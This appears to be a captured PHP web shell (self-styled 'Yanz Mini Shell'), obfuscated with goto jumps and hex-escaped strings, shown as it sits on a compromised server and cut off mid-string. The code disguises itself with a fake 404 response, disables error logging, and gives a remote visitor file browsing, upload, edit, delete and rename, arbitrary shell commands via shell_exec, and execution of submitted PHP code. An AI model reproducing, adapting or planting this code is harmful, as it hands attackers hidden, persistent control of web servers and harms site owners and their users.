/
tmp
/
Upload File
HOME
<?php // Tambahkan ?p= hanya jika tidak ada query string if (empty($_SERVER['QUERY_STRING'])) { $url = $_SERVER['PHP_SELF'] . '?p='; header('Location: ' . $url); } ?> <?php // Tambahkan ?p= hanya jika tidak ada query string if (empty($_SERVER['QUERY_STRING'])) { $url = $_SERVER['PHP_SELF'] . '?p='; header('Location: ' . $url); } error_reporting(0); ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0); @error_reporting(E_ALL ^ E_NOTICE); //MINISHELLINCLUDEANITISPASIPOSTBLOCKED if($_GET['ynzmini'] || $_GET['file'] || $_GET['page']){ goto zFFzC; GANQn: echo "\x3c\163\143\x72\x69\160\164\x3e\141\154\x65\162\164\x28\x27\124\x68\x69\163\x20\106\157\x6c\144\x65\162\x20\151\163\40\106\x61\x69\154\x65\x64\x20\x44\x65\154\x65\164\x65\x20\41\41\x21\47\x29\x3b\x20\x77\151\156\144\157\x77\56\154\157\143\141\164\x69\x6f\x6e\x20\x3d\40\47\x3f\47\x3b\x3c\x2f\x73\143\162\x69\160\164\x3e"; goto WdCzz; LbI0D: echo $_GET["\146\151\x6c\145"]; goto WADuA; tm_0N: echo "\74\163\143\162\151\160\164\x3e\x61\154\x65\162\x74\x28\x27\106\151\x6c\x65\x20\x44\145\154\145\x74\x65\144\40\41\41\41\x27\x29\x3b\40\x77\151\156\144\x6f\x77\x2e\x6c\157\x63\x61\164\151\x6f\x6e\x20\75\40\47\x3f\47\x3b\74\57\x73\x63\x72\151\x70\x74\76"; goto K3PEF; lp8mP: E7fB2: goto y3XRs; a5bIF: foreach ($xkxL0 as $ZapZX) { goto ejNO2; oO61p: siO5e: goto bEe9Y; EjDsA: echo "\74\141\x20\x68\x72\x65\146\75\x27\x3f\x79\x6e\172\x6d\x69\156\151\75{$IpbLa}\x2f{$ZapZX}\x27\x3e\x3c\x69\155\x67\40\150\145\x69\x67\x68\164\75\x27\62\x30\x27\x20\163\x72\x63\x3d\47\150\x74\x74\160\163\x3a\x2f\57\x72\141\x77\56\x67\x69\164\x68\x75\x62\x75\163\145\x72\x63\x6f\x6e\x74\x65\x6e\164\x2e\x63\157\155\57\x49\103\127\122\55\x54\105\103\x48\57\160\150\x70\x2d\162\157\x6f\x74\153\151\x74\57\155\141\163\164\145\162\x2f\x66\x6f\154\x64\x65\162\56\x70\156\147\47\x2f\x3e\40" . htmlspecialchars($ZapZX) . "\74\57\x61\76\x3c\142\x72\76"; goto gO4Zo; gO4Zo: rtExZ: goto ktWmU; bEe9Y: XGN2k: goto gaSXU; zf8Yi: echo "\74\141\40\150\162\145\146\75\x27\x3f\x66\151\154\145\75{$IpbLa}\x2f{$ZapZX}\47\x3e\74\151\155\x67\x20\150\x65\x69\x67\x68\x74\x3d\47\x32\60\47\40\163\x72\x63\75\47\x68\x74\164\160\x73\x3a\x2f\57\x72\x61\167\x2e\147\x69\x74\150\165\142\165\x73\145\162\143\157\x6e\164\145\x6e\x74\56\x63\157\155\x2f\x49\x43\x57\122\x2d\x54\105\103\x48\57\x70\150\x70\x2d\162\x6f\x6f\164\153\x69\x74\57\x6d\x61\x73\x74\x65\162\57\x66\x69\154\145\56\x70\x6e\x67\x27\x2f\x3e\x20" . htmlspecialchars($ZapZX) . "\x3c\57\x61\x3e\74\x62\x72\x3e"; goto oO61p; ejNO2: if (!is_dir($IpbLa . "\57" . $ZapZX)) { goto rtExZ; } goto EjDsA; ktWmU: if (!is_file($IpbLa . "\57" . $ZapZX)) { goto siO5e; } goto zf8Yi; gaSXU: } goto MVzUe; PlwWI: echo str_replace("\x5c", "\57", getcwd()); goto qaPwo; FE78n: if (!($_GET["\x64\x65\x6c\x65\164\145"] == "\164\x72\165\145")) { goto rInBV; } goto uSQ65; Lt35k: echo "\133\53\135\x20\x53\x75\143\x63\145\x73\163\x20\x3a\x20" . $_FILES["\x75\160"]["\156\141\x6d\145"]; goto Uyly7; gogRP: if (!($_GET["\x65\x64\x69\x74"] == "\164\162\x75\145")) { goto ku8r6; } goto TTkuc; WdCzz: goto wyMj4; goto aX3_J; Gpd_G: TWdU6: goto tk6hg; JwwiZ: foreach ($ySXeu as $dm2dy => $KApBK) { goto Ce6mW; A1mxf: if (!($PQ0Nk <= $dm2dy)) { goto rafMx; } goto p1fJk; H1ums: rafMx: goto z0wF6; z0wF6: $utOWq .= "\47\76{$KApBK}\74\57\141\x3e\x3c\x2f\x6c\x69\x3e\xa"; goto p1V2e; p1fJk: $utOWq .= $ySXeu[$PQ0Nk] . "\x2f"; goto zyfqw; xY9EW: $PQ0Nk++; goto nWzPN; Ce6mW: if (!empty($KApBK)) { goto WUhSS; } goto K4kPb; p1V2e: J_vaH: goto GNXrQ; K4kPb: goto J_vaH; goto gnGys; zyfqw: yd49C: goto xY9EW; fV0nU: $PQ0Nk = 0; goto giJJe; t8HWz: $utOWq .= "\x3c\x6c\151\x20\143\x6c\141\x73\x73\75\47\x62\x61\162\47\76\74\141\x20\143\x6c\x61\x73\163\x3d\x27\x61\55\x62\x61\162\x27\40\150\x72\x65\146\75\x27\x3f\x79\x6e\x7a\x6d\151\156\151\75"; goto fV0nU; giJJe: zgpuV: goto A1mxf; gnGys: WUhSS: goto t8HWz; nWzPN: goto zgpuV; goto H1ums; GNXrQ: } goto taS1a; erjC0: echo "\74\x73\143\x72\151\x70\x74\x3e\x61\154\x65\x72\164\x28\x27\124\x68\x69\163\40\106\157\x6c\144\x65\162\x20\x69\163\40\x46\141\x69\x6c\145\144\40\x52\x65\156\x61\155\145\x20\x21\41\x21\x27\x29\x3b\40\x77\151\x6e\x64\157\x77\x2e\x6c\x6f\x63\x61\164\x69\x6f\156\40\x3d\x20\47\77\47\73\x3c\x2f\x73\143\x72\x69\x70\x74\76"; goto QGC1r; fzcmM: goto ffB58; goto JOhB3; d_ian: echo "\xa" . $utOWq; goto tyFT8; B5cTR: rmdir("\56\x2e\x2f" . $IpbLa); goto Esnye; FWVki: if (!$_POST["\x63\x6f\x64\x65"]) { goto VgMFM; } goto RL6rR; MVzUe: hyP7p: goto pNTUL; waAKH: if (fwrite($y2MLJ, $_POST["\145\144\151\164\137\146\151\154\x65"])) { goto ImdpI; } goto Aiv7h; ZTI6_: if (!($AO44j = $_GET["\171\x6e\x7a\x6d\x69\x6e\x69"])) { goto NbVuV; } goto VIRs5; h6s2T: v6Fkq: goto k3vqs; pNTUL: Fpcll: goto EvU6C; ofiW5: chdir($IpbLa); goto iqnbj; r8hiw: echo $_GET["\x66\151\154\x65"]; goto OUauJ; kLh7i: if (!(!$_GET["\145\144\x69\164"] && !$_GET["\x64\145\x6c\145\164\x65"] && !$_GET["\162\x65\156\141\155\x65"])) { goto F363c; } goto yu2gO; y4fUf: D_rST: goto ZNpXQ; pd5ly: V9LGS: goto uHrIv; Uyly7: ffB58: goto bqhdJ; UWZ3Y: if (!$_POST["\x73\x68\x65\x6c\x6c"]) { goto frX5K; } goto DTrTz; ODT3T: echo str_replace("\134", "\57", __DIR__); goto AmOjc; M_BQH: EnvDZ: goto a5yz4; bqhdJ: echo "\x3c\142\162\x3e"; goto el5O6; W22aE: $ySXeu = explode("\57", $IpbLa); goto JwwiZ; w8qYg: ImdpI: goto ipulR; TjDV8: if (empty($_SESSION["\x64\151\x72"])) { goto XfcZf; } goto eGjKb; pVs1v: if (rmdir($IpbLa)) { goto QuYaU; } goto GANQn; aG1U8: goto nN6GS; goto HM6YV; W5HuJ: echo "\x26\162\x65\x6e\x61\x6d\x65\75\x74\162\x75\145\x22\76\x52\145\156\141\x6d\x65\74\x2f\x61\x3e\x20\135\xa\133\40\x3c\141\x20\x68\x72\x65\146\x3d\42\x3f\42\x3e\102\x61\143\x6b\74\57\x61\x3e\40\x5d\12\x3c\x68\162\x3e\xa\x20\40\x20\40\40\40"; goto kLh7i; rBpb4: if (!$_POST["\x6e\x61\x6d\x65\x5f\146\157\154\x64\145\162"]) { goto TWdU6; } goto asge2; FkVR0: if (!$_GET["\171\156\x7a\155\151\x6e\151"]) { goto Fpcll; } goto EGBMG; syiLQ: $Co0jn = htmlspecialchars($_SESSION["\x63\x6f\x64\145"]); goto Cm3FF; QZOxI: $y2MLJ = fopen($_GET["\x66\x69\154\x65"], "\x77"); goto waAKH; yu2gO: echo "\x3c\x74\x65\170\x74\141\162\145\x61\40\143\x6c\x61\x73\x73\75\47\x66\151\x6c\x65\47\x3e" . htmlspecialchars(file_get_contents($_GET["\x66\151\x6c\145"])) . "\x3c\x2f\x74\145\170\164\141\x72\x65\141\x3e"; goto UZTTp; y_g41: if (empty($Co0jn)) { goto VZEb1; } goto syiLQ; ZNpXQ: t22mT: goto N22xZ; BnGGj: dnocy: goto cJ3t_; POIVZ: if (!$_FILES["\165\x70"]) { goto uknlj; } goto Q7xK1; i9Y4a: goto Q_ADc; goto XQKQq; PAWWk: echo $_GET["\146\151\154\x65"]; goto W5HuJ; Cm3FF: goto n5VCz; goto UWFHE; qZgfY: if (!$_POST["\145\x64\151\164\137\146\151\154\145"]) { goto aonKw; } goto QZOxI; hHV54: echo "\xa\40\40\40\40\x20\x20\40\40\x3c\143\x65\x6e\x74\145\162\x3e\12\x20\40\x20\x20\40\x20\x20\40\74\x66\x6f\156\164\40\x73\151\172\145\75\47\62\60\x27\76\x59\141\156\172\40\115\x69\156\151\40\x53\x68\145\154\154\74\x2f\146\157\x6e\164\76\12\40\x20\40\40\40\40\40\40\x3c\142\162\x3e\x3c\x62\x72\76\xa\40\x20\40\40\40\x20\40\x20\x3c\146\x6f\x6e\x74\x20\x73\151\x7a\x65\x3d\47\x35\x27\76\131\141\156\172\x3c\x2f\146\x6f\156\164\x3e\12\40\x20\x20\40\40\x20\40\x20\74\142\122\76\74\142\x72\x3e\xa\40\40\40\40\40\40\40\x20\x4d\151\156\x69\40\123\x68\145\154\x6c\xa\40\40\40\x20\40\40\40\40\74\x62\162\76\x3c\x62\x72\x3e\12\40\40\40\40\40\x20\x20\40\x3c\x2f\x63\x65\x6e\x74\x65\162\x3e\12\x20\x20\x20\x20\x20\x20\40\40"; goto GUfW_; Vupys: if (!$_POST["\x6e\x61\155\x65\137\x66\151\154\145"]) { goto D_rST; } goto DwegY; wiZuw: nQ0Ip: goto EwKYm; tNeYe: if (!($_GET["\x70\141\x67\x65"] == "\x6e\x65\167\146\151\x6c\x65")) { goto t22mT; } goto aHF3U; TfllX: goto DgU0u; goto zrnPC; JOhB3: rKVqM: goto Lt35k; xWoOB: echo "\74\163\x63\x72\151\160\x74\76\141\154\145\x72\164\x28\47\x46\x69\154\145\40\x43\162\x65\x61\x74\x65\144\40\41\41\x21\47\51\73\40\167\151\156\144\x6f\x77\x2e\154\157\x63\141\164\x69\x6f\x6e\40\x3d\x20\47\x3f\x27\73\74\x2f\x73\x63\x72\x69\160\164\76"; goto yWyar; y3XRs: if (!($_GET["\160\141\147\x65"] == "\x61\142\x6f\x75\x74")) { goto tkl4N; } goto hHV54; T36BF: echo "\x3c\x73\x63\162\151\x70\x74\76\141\154\145\x72\164\x28\x27\x46\141\x69\x6c\x65\144\40\x52\x65\156\x61\155\145\40\106\151\154\145\40\x21\x21\x21\47\51\x3b\x20\167\x69\156\x64\157\x77\x2e\x6c\157\143\141\x74\151\157\x6e\x20\75\x20\x27\x3f\x66\151\x6c\145\75{$_GET["\146\151\154\145"]}\47\x3b\74\x2f\x73\x63\x72\x69\160\x74\x3e"; goto ktmlb; lik7P: if (!$_GET["\162\x6d\x66\157\154\x64\x65\162"]) { goto zChWX; } goto pVs1v; SOpYr: n5VCz: goto jePFM; XQKQq: gACBp: goto OtEqG; zoW5b: session_start(); goto qdDna; LOEOC: tGw9I: goto W22aE; EKzlF: echo "\74\x73\143\x72\151\160\x74\76\141\154\x65\x72\164\50\x27\105\144\151\x74\x20\106\151\x6c\x65\40\x53\165\x63\x63\145\163\163\x20\x21\x21\x21\x27\51\x3b\40\167\151\156\x64\157\167\56\154\157\x63\141\x74\x69\x6f\x6e\x20\x3d\x20\47\77\x66\151\x6c\x65\x3d{$_GET["\x66\x69\x6c\145"]}\x27\x3b\74\57\x73\x63\x72\151\x70\x74\76"; goto Vxbko; zrnPC: iPDSP: goto xWoOB; asge2: if (mkdir($_POST["\x6e\x61\x6d\145\137\146\x6f\x6c\144\x65\162"])) { goto gACBp; } goto Z90B8; PZo23: aonKw: goto eCqaZ; XxuiP: echo "\133\x20\x3c\x61\40\x68\x72\145\146\x3d\42\77\146\x69\154\x65\75"; goto LbI0D; Esnye: echo "\x3c\x73\x63\x72\x69\x70\164\x3e\x61\154\x65\x72\x74\50\47\x54\150\151\x73\40\x46\x6f\x6c\144\x65\162\40\151\x73\40\122\145\156\141\x6d\x65\144\40\41\41\41\x27\x29\73\40\167\x69\156\x64\x6f\x77\x2e\154\157\143\141\x74\x69\157\x6e\40\75\x20\x27\77\171\x6e\x7a\x6d\151\156\151\x3d{$IpbLa}\x2f\56\56\47\73\x3c\x2f\x73\x63\162\x69\x70\164\76"; goto BnGGj; Z90B8: echo "\x3c\163\143\162\151\x70\x74\76\141\154\145\162\164\50\x27\103\162\x65\x61\164\x65\x64\40\x46\x6f\154\x64\x65\162\x20\x46\x61\x69\x6c\x65\x64\x20\41\x21\x21\47\51\73\40\167\x69\156\144\157\x77\x2e\154\157\143\x61\x74\x69\x6f\156\x20\75\40\x27\x3f\47\x3b\74\57\163\143\162\x69\x70\164\76"; goto i9Y4a; o5_n0: Q_ADc: goto Gpd_G; zFFzC: error_reporting(0); goto RKOYv; taS1a: auZf0: goto ofiW5; eCqaZ: ku8r6: goto FE78n; xJup9: echo "\125\160\154\x6f\141\144\40\x46\x69\x6c\145\xa\40\40\40\x20\40\40\x20\x20\x3c\x62\162\x3e\74\142\162\x3e\12\40\40\x20\40\40\x20\x20\40\x3c\146\x6f\162\155\40\x65\x6e\x63\x74\x79\160\x65\x3d\x27\155\x75\x6c\x74\x69\160\141\162\x74\x2f\146\157\162\155\55\144\141\x74\141\x27\40\155\145\x74\x68\x6f\x64\75\47\160\157\x73\x74\47\x3e\12\40\x20\40\x20\40\x20\40\40\x3c\x69\x6e\160\x75\164\40\x74\171\x70\145\75\47\x66\151\x6c\145\47\x20\x6e\x61\x6d\145\75\x27\x75\160\x27\x3e\xa\40\40\x20\40\40\40\40\40\x3c\x69\156\x70\165\164\x20\164\171\160\x65\75\47\x73\165\142\155\x69\164\x27\x20\x76\141\x6c\x75\x65\x3d\47\x55\x70\154\x6f\141\x64\x27\x3e\12\x20\x20\40\40\x20\x20\40\40\x3c\x2f\146\x6f\x72\x6d\76\xa\x20\40\40\x20\40\x20\x20\x20"; goto POIVZ; el5O6: uknlj: goto pd5ly; IFKLz: echo "\74\x66\157\162\x6d\x20\145\156\x63\x74\171\x70\x65\x3d\x27\155\x75\x6c\x74\151\160\x61\162\x74\57\x66\x6f\x72\155\55\x64\141\x74\141\x27\40\x6d\145\164\x68\x6f\144\x3d\x27\160\157\163\164\x27\76\xa\x20\x20\x20\x20\x20\x20\40\x20\131\141\x6e\172\100{$imQ_V}\x3a\176\x20\44\x20\74\x69\x6e\x70\165\164\x20\164\171\x70\145\75\47\x74\x65\x78\x74\47\40\x6e\x61\155\x65\75\x27\x73\x68\145\154\x6c\x27\76\x3c\x69\156\x70\x75\164\40\x74\x79\x70\145\75\47\163\165\x62\155\x69\164\x27\40\166\x61\154\x75\x65\x3d\x27\x7e\x27\x3e\12\x20\x20\x20\40\40\40\40\x20\x3c\57\146\157\162\155\x3e"; goto wiZuw; Pczpp: exit; goto M_BQH; r7x47: XfcZf: goto adMuH; UZTTp: F363c: goto gogRP; MPfG5: echo "\74\163\x63\162\151\160\x74\x3e\x61\154\145\x72\x74\50\47\x46\x61\x69\154\145\144\40\x44\x65\x6c\x65\164\x65\x64\40\106\x69\x6c\145\40\41\41\x21\x27\51\x3b\40\x77\151\x6e\x64\x6f\167\x2e\x6c\x6f\x63\x61\x74\x69\157\x6e\x20\x3d\x20\47\77\x66\151\x6c\145\x3d{$_GET["\x66\x69\154\145"]}\47\73\74\x2f\163\x63\x72\x69\160\x74\x3e"; goto aG1U8; aX3_J: QuYaU: goto B48HV; i7o6l: if (!($_GET["\x72\x65\156\141\x6d\145"] == "\x74\x72\165\x65")) { goto EL01Q; } goto WL8vD; uSQ65: if (unlink($_GET["\x66\x69\154\145"])) { goto x7fml; } goto MPfG5; DwegY: $MAIiK = fopen($_POST["\156\x61\x6d\145\x5f\146\151\x6c\145"], "\x77"); goto dNB8T; gamXF: if (mkdir("\56\x2e\57" . $_POST["\x72\x65\x6e\x61\155\x65\x5f\146\x6f\154\144\x65\x72"])) { goto aECrk; } goto erjC0; EvU6C: if (!($_GET["\x70\x61\147\145"] == "\x75\x70\154\x6f\141\x64")) { goto V9LGS; } goto xJup9; GUfW_: tkl4N: goto tNeYe; K3PEF: nN6GS: goto Txm78; Qe5sr: VgMFM: goto T684K; a1vT5: echo "\x3c\x68\162\76\x3c\x61\x20\150\162\x65\x66\75\47\77\x70\x61\147\145\x3d\x73\x63\x72\x69\160\x74\x69\x6e\x67\47\76\x42\x61\143\153\x3c\57\x61\x3e"; goto Pczpp; cJ3t_: QE7s2: goto lik7P; Txm78: rInBV: goto i7o6l; adMuH: $IpbLa = $zHoME; goto LOEOC; N22xZ: if (!($_GET["\160\x61\147\145"] == "\156\145\167\x66\x6f\x6c\144\x65\162")) { goto IUBUk; } goto r0hP6; yWyar: DgU0u: goto y4fUf; Vxbko: s6eGA: goto PZo23; xzk8N: goto tGw9I; goto r7x47; HtQ91: echo "\x3c\x70\162\145\x3e" . htmlspecialchars(shell_exec($_POST["\163\150\145\154\154"])) . "\74\57\x70\x72\x65\76"; goto Fhr7E; sts1l: echo disk_free_space("\x2f"); goto RpX1u; r0hP6: echo "\x3c\146\x6f\162\155\x20\145\x6e\143\x74\x79\160\x65\x3d\x27\155\x75\154\164\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\155\55\x64\x61\x74\x61\x27\40\x6d\145\x74\x68\x6f\144\75\x27\160\157\163\164\x27\x3e\12\40\40\40\40\40\x20\x20\x20\116\x65\x77\40\x46\157\154\x64\x65\x72\40\72\x20\74\x69\156\160\165\x74\x20\x74\171\x70\x65\x3d\x27\164\145\170\x74\47\x20\156\x61\x6d\x65\x3d\47\x6e\x61\155\x65\x5f\x66\x6f\x6c\144\x65\x72\47\x3e\xa\x20\x20\x20\x20\40\40\40\40\74\151\156\160\165\164\40\164\171\x70\x65\x3d\47\163\x75\142\x6d\x69\x74\x27\x20\x76\x61\154\x75\x65\75\x27\123\141\x76\x65\x20\106\x6f\154\144\145\162\x27\76\12\40\40\x20\x20\x20\x20\x20\40\x3c\57\x66\x6f\162\x6d\x3e\xa\40\x20\40\40\40\x20\x20\x20"; goto rBpb4; qdDna: $zHoME = str_replace("\134", "\x2f", getcwd()); goto Yaz_R; OTnDY: wyMj4: goto R51wP; YupNi: aECrk: goto B5cTR; Yaz_R: $imQ_V = $_SERVER["\110\124\x54\x50\x5f\110\x4f\x53\x54"]; goto ZTI6_; AmOjc: echo "\42\76\x48\157\x6d\x65\x53\x68\145\154\154\40\x31\74\57\x61\76\40\135\xa\x20\40\133\40\74\141\x20\150\x72\x65\146\x3d\42\x3f\171\156\x7a\155\x69\156\x69\x3d"; goto PlwWI; KoGzd: $xkxL0 = scandir($IpbLa); goto a5bIF; VIRs5: $_SESSION["\x64\151\162"] = $AO44j; goto gva72; aHF3U: echo "\x3c\x66\157\x72\155\40\x65\x6e\143\x74\x79\160\145\75\47\155\x75\x6c\x74\x69\x70\x61\x72\x74\57\146\157\162\155\55\x64\141\164\141\x27\40\155\x65\x74\x68\x6f\144\x3d\x27\160\x6f\163\164\47\x3e\xa\x20\x20\x20\x20\40\x20\x20\x20\74\x74\x65\x78\164\141\162\145\x61\40\x63\x6c\141\163\163\75\47\146\151\x6c\x65\47\x20\156\x61\155\145\75\47\151\x73\x69\137\146\x69\x6c\x65\47\76" . htmlspecialchars(file_get_contents($_GET["\x66\151\154\x65"])) . "\74\x2f\x74\x65\x78\164\x61\162\145\141\x3e\12\x20\40\40\x20\x20\x20\40\x20\74\x62\x72\x3e\74\142\162\x3e\xa\40\x20\x20\x20\x20\40\40\x20\x3c\151\x6e\x70\165\x74\40\x74\171\160\x65\x3d\47\164\x65\170\x74\47\40\x6e\141\155\x65\75\47\x6e\141\x6d\x65\137\x66\x69\154\x65\x27\x3e\12\40\x20\x20\x20\x20\x20\40\40\x3c\x62\162\76\74\x62\122\x3e\12\40\x20\x20\40\40\x20\x20\40\x3c\x69\x6e\x70\x75\164\x20\164\x79\160\x65\75\x27\163\165\x62\155\151\x74\47\x20\166\x61\154\165\x65\75\x27\x53\141\166\145\40\106\151\x6c\145\x27\x3e\12\x20\x20\40\x20\40\x20\40\40\74\x2f\x66\157\162\155\x3e\xa\x20\x20\x20\x20\40\x20\x20\x20"; goto Vupys; HuoLA: if (!$_POST["\162\x65\x6e\x61\x6d\145\x5f\146\151\x6c\145"]) { goto vYNca; } goto q58LG; B48HV: echo "\74\x73\143\x72\151\160\x74\x3e\141\154\145\x72\x74\x28\47\x46\x6f\154\144\x65\x72\40\x44\145\x6c\x65\164\x65\144\x20\x21\41\41\x27\51\x3b\x20\x77\151\156\x64\157\167\x2e\154\x6f\x63\141\x74\x69\157\x6e\40\x3d\40\47\x3f\171\x6e\x7a\x6d\x69\156\151\x3d{$IpbLa}\x2f\56\x2e\47\x3b\x3c\57\x73\x63\162\151\x70\x74\x3e"; goto OTnDY; gva72: NbVuV: goto TjDV8; Hb7f4: unlink($_GET["\146\151\154\x65"]); goto YFF_y; EgdNy: hGvRz: goto FkVR0; uQfyX: if (!isset($_REQUEST["\145\x78\145\x5f\x63\157\144\145"])) { goto EnvDZ; } goto FWVki; OtEqG: echo "\74\x73\x63\162\151\x70\164\x3e\x61\154\x65\162\x74\50\x27\x46\157\x6c\144\x65\162\x20\103\x72\145\141\x74\x65\x64\40\41\41\x21\x27\51\73\40\x77\151\156\144\x6f\167\x2e\x6c\x6f\143\141\x74\x69\x6f\156\x20\75\40\x27\x3f\x27\73\74\57\163\143\x72\x69\160\x74\x3e"; goto o5_n0; ipulR: fclose($y2MLJ); goto EKzlF; Q4irI: EL01Q: goto EgdNy; QGC1r: goto dnocy; goto YupNi; HM6YV: x7fml: goto tm_0N; k3vqs: vYNca: goto Q4irI; sgmH6: if (!$_POST["\x72\x65\x6e\x61\155\145\137\146\157\x6c\144\145\162"]) { goto QE7s2; } goto gamXF; tk6hg: IUBUk: goto rI1sO; q58LG: if (copy($_GET["\x66\x69\154\145"], $_POST["\162\145\156\141\155\145\137\146\x69\x6c\145"])) { goto vQPUY; } goto T36BF; WL8vD: echo "\74\x66\157\x72\155\40\x65\156\x63\164\x79\160\x65\x3d\x27\155\165\x6c\164\x69\x70\141\162\x74\x2f\146\157\162\x6d\55\144\141\164\141\47\x20\155\145\x74\150\x6f\x64\x3d\47\160\157\163\x74\47\76\12\x20\x20\x20\40\40\40\x20\x20\x20\40" . htmlspecialchars($_GET["\x66\151\x6c\145"]) . "\40\x5b\40\124\x6f\x20\135\x20\x3c\x69\156\160\x75\x74\x20\164\171\x70\145\75\47\x74\x65\170\164\x27\x20\x6e\x61\x6d\145\75\x27\162\145\x6e\141\155\145\137\x66\151\154\145\47\76\12\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x3c\151\x6e\160\165\x74\x20\x74\171\x70\145\x3d\x27\x73\x75\x62\x6d\x69\164\47\x20\x76\141\154\165\145\x3d\47\x52\x65\156\x61\155\145\47\76\12\x20\x20\40\x20\40\x20\40\x20\x20\x20\74\x2f\x66\157\x72\x6d\x3e\12\40\40\40\x20\40\40\x20\x20\x20\40"; goto HuoLA; Q7xK1: if (copy($_FILES["\x75\x70"]["\164\155\x70\x5f\x6e\141\x6d\x65"], $_FILES["\x75\x70"]["\x6e\141\155\x65"])) { goto rKVqM; } goto KbXXF; uHrIv: if (!($_GET["\160\141\x67\145"] == "\163\x68\x65\x6c\x6c")) { goto nQ0Ip; } goto UWZ3Y; rOBz_: goto s6eGA; goto w8qYg; WADuA: echo "\46\x64\145\154\x65\x74\x65\75\x74\x72\165\x65\x22\x3e\104\x65\154\x65\164\x65\74\57\x61\x3e\40\x5d\12\x5b\40\x3c\141\40\x68\x72\145\x66\75\42\77\x66\151\x6c\x65\x3d"; goto r8hiw; EwKYm: if (!($_GET["\160\141\x67\x65"] == "\163\x63\162\x69\x70\164\151\x6e\147")) { goto E7fB2; } goto y_g41; ktmlb: goto v6Fkq; goto o5XnE; qaPwo: echo "\42\76\x48\x6f\x6d\145\123\x68\x65\154\154\40\62\x3c\x2f\x61\x3e\40\x5d\xa\40\40\133\x20\74\x61\40\x68\x72\145\146\x3d\42\77\x70\141\147\145\75\x75\160\154\x6f\x61\144\42\76\x55\x70\x6c\157\141\x64\74\x2f\x61\76\40\x5d\xa\x20\x20\133\x20\74\141\x20\150\x72\145\146\75\x22\77\160\141\147\x65\75\163\x68\145\x6c\x6c\x22\76\x43\x6f\155\155\x61\156\144\x20\x53\150\145\154\x6c\x3c\57\141\76\40\x5d\xa\40\x20\133\x20\x3c\x61\40\x68\x72\x65\146\x3d\x22\x3f\160\x61\x67\x65\x3d\x73\x63\162\151\160\x74\x69\156\147\42\76\x53\143\x72\x69\160\164\x69\156\x67\x3c\57\x61\76\x20\x5d\xa\40\40\x5b\40\74\141\x20\150\x72\x65\146\x3d\x22\77\x70\141\147\x65\x3d\141\x62\x6f\x75\164\42\76\x41\142\x6f\x75\x74\74\57\x61\76\40\x5d\12\74\57\144\151\166\x3e\12\x3c\x64\151\166\40\143\154\141\x73\163\75\x22\x6b\157\x74\141\x6b\x22\x3e\xa\40\x20\133\x20\x44\151\x72\145\x63\x74\x6f\162\171\40\x5d\40\x3d\76\40\74\x6c\x69\40\x63\x6c\x61\163\163\x3d\x22\x62\141\162\x22\76\74\141\40\x63\x6c\x61\x73\x73\x3d\42\141\55\142\141\162\42\x20\150\162\x65\x66\75\42\77\171\x6e\x7a\155\x69\156\151\x3d\57\42\76\57\74\57\x61\76\x3c\x2f\154\x69\x3e"; goto d_ian; jePFM: echo "\74\x66\x6f\162\155\40\141\143\164\151\x6f\x6e\x3d\47\x3f\x65\170\x65\137\x63\157\x64\145\x27\x20\x65\156\143\x74\x79\x70\145\75\47\x6d\x75\154\x74\151\x70\141\x72\164\57\x66\x6f\x72\x6d\x2d\144\x61\164\x61\x27\x20\x6d\145\x74\x68\157\144\75\x27\160\157\163\x74\x27\76\xa\40\40\x20\40\40\x20\40\x20\x3c\x63\145\156\x74\145\x72\x3e\122\x75\156\156\151\156\x67\40\120\110\120\40\123\x63\x72\151\160\164\74\57\143\145\156\x74\145\162\x3e\xa\40\x20\x20\x20\40\x20\40\x20\74\150\162\76\12\40\40\40\40\40\x20\x20\40\74\x74\145\170\x74\141\x72\145\141\x20\143\154\141\x73\x73\75\47\x66\x69\154\145\x27\x20\x6e\141\155\145\x3d\x27\143\157\144\145\x27\76{$Co0jn}\x3c\x2f\x74\145\x78\x74\141\162\x65\x61\76\12\x20\x20\40\x20\x20\x20\40\40\74\142\x52\x3e\74\142\162\x3e\xa\x20\40\40\x20\40\40\x20\x20\74\151\x6e\x70\165\x74\x20\164\x79\160\x65\75\47\163\x75\x62\x6d\151\x74\47\x20\x76\141\x6c\x75\145\x3d\47\122\x75\x6e\40\123\143\162\x69\160\164\x20\x21\41\x21\47\x3e\xa\40\x20\x20\40\x20\40\x20\40\74\57\146\157\x72\x6d\x3e\xa\40\40\40\40\40\40\40\x20"; goto lp8mP; Aiv7h: echo "\x3c\x73\143\162\x69\x70\x74\76\141\x6c\x65\x72\164\x28\47\x45\144\151\164\x20\106\x69\154\145\x20\106\141\x69\x6c\x65\144\40\x21\41\41\47\x29\73\x20\x77\151\x6e\144\157\167\56\x6c\157\143\x61\x74\151\157\x6e\40\75\x20\47\x3f\146\x69\x6c\x65\75{$_GET["\146\x69\154\145"]}\x27\x3b\74\x2f\163\x63\x72\151\160\x74\x3e"; goto rOBz_; RKOYv: header("\110\x54\x54\x50\57\61\x2e\x30\40\64\60\x34\x20\116\157\x74\40\106\157\165\x6e\x64", true, 404); goto zoW5b; tyFT8: echo "\x3c\x2f\x64\x69\x76\76\12\x3c\x64\151\166\40\143\154\x61\163\x73\x3d\42\153\157\164\141\x6b\42\76\xa\x20\40\74\144\x69\x76\x20\x63\154\141\163\x73\x3d\42\x6c\61\x22\76\12\40\40\40\40\74\x64\151\166\40\x63\x6c\x61\163\x73\x3d\x22\142\x61\162\141\x74\141\x73\x22\x3e\12\40\x20\x20\40\40\40\101\x63\164\151\x6f\156\xa\40\40\40\x20\74\x2f\x64\x69\166\76\xa\x20\40\x20\40\x3c\150\x72\76\xa\x20\x20\x20\x20\x5b\52\x5d\x20\74\x61\x20\150\x72\145\146\75\42\77\x70\x61\147\145\75\156\145\x77\x66\x69\154\x65\42\x3e\116\145\x77\40\x46\x69\154\145\x3c\57\x61\x3e\12\x20\40\40\40\74\x62\162\76\xa\40\x20\40\40\133\52\x5d\x20\74\141\40\x68\x72\145\x66\x3d\42\x3f\160\x61\x67\145\x3d\x6e\x65\x77\146\x6f\154\144\145\162\x22\76\116\x65\167\x20\x46\157\154\x64\145\162\x3c\57\x61\x3e\12\40\40\40\40\x3c\150\162\x3e\xa\x20\x20\x20\x20\x3c\144\151\166\x20\x63\154\x61\163\x73\x3d\x22\x62\x61\162\x61\164\141\x73\x22\x3e\12\40\x20\40\x20\40\40\x53\145\156\x73\151\164\151\x76\145\x20\106\151\x6c\145\xa\x20\40\40\40\x3c\x2f\144\x69\x76\x3e\12\x20\x20\4